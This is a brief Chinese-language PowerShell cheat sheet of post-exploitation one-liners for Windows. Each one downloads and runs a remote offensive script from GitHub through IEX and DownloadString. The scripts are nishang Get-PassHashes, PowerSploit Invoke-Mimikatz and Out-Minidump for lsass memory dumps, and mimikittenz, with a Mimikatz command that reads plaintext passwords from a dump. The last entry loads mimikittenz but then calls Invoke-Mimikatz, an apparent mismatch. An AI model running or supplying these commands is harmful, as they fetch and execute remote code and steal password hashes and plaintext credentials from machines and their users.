Powershell

持续更新

1、dump hash

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

2、执行powershell版的Mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

3、获取lsass.exe的dumps，然后再用Mimikatz从dumps中获取明文

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1');"Get-Process lsass | Out-Minidump"

Mimikatz.exe "sekurlsa::minidump lsass_504.dmp"

4、提取各种目标进程的明文密码

http://www.freebuf.com/sectool/109958.html

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-Mimikatz